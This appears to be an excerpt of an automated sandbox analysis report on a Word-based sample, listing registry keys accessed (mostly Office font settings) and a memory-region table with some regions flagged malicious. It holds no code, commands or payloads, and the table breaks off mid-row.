HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Aparajita
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gisha
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Kokila
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MoolBoran
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Utsaah
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Vijaya
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Andalus
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Arabic Typesetting
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Simplified Arabic
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Simplified Arabic Fixed
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Sakkal Majalla
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Traditional Arabic
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Aharoni
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
David
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
FrankRuehl
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Levenim MT
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Miriam
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Miriam Fixed
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Narkisim
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Rod
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
FangSong
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@FangSong
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@SimHei
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
AngsanaUPC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Browallia New
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
BrowalliaUPC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
CordiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
DilleniaUPC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
EucrosiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
FreesiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
IrisUPC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
JasmineUPC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
KodchiangUPC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
LilyUPC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Calibri Light
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\69CEB
69CEB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{E7E4BC40-E76A-11CE-A9BB-00AA004AE837} {000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Agency FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aharoni
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Algerian
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Andalus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Angsana New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Typewriter
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Yi Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Specialty
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MT Extra
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\71FDF
71FDF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
WORDFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\71FDF
71FDF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Data
Settings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options
ZoomApp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTA
There are 700 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
F50000
heap
page read and write
malicious
3700000
heap
page read and write
malicious
2CE0000
remote allocation
page execute and read and write
malicious
1080000
heap
page read and write
malicious
4430000
heap
page read and write
9230000
trusted library allocation
page read and write
160000
trusted library allocation
page read and write
9560000
trusted library allocation
page read and write
7FE0000
trusted library allocation
page read and write
4E1E000
unkown
page read and write
9540000
trusted library allocation
page read and write
2C30000
trusted library allocation
page read and write
6E17000
trusted library allocation
page read and write
91A0000
trusted library allocation
page read and write
9170000
trusted library allocation
page read and write
7320000
trusted library allocation
page read and write
59D2000
trusted library allocation
page read and write
2C60000
trusted library allocation
page read and write
4C0D000
unkown
page read and write
28267670000
heap
page read and write
626D000
trusted library allocation
page read and write
4B8E000
unkown
page read and write
92F0000
trusted library allocation
page read and write
8210000
trusted library allocation
page read and write
9D90000
unkown
page readonly
9090000
trusted library allocation
page read and write
5A3E000
trusted library allocation
page read and write
1F8A6302000
heap
page read and write
583F000
trusted library allocation
page read and write
1C27D170000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
FC2000
heap
page read and write
2C60000
trusted library allocation
page read and write
8F50000
trusted library allocation
page read and write
2D611458000
heap
page read and write
9FB0000
trusted library allocation
page read and write
90A0000
trusted library allocation
page read and write
150000
heap
page read and write
4D40000
heap
page read and write
90E0000
trusted library allocation
page read and write
482C000
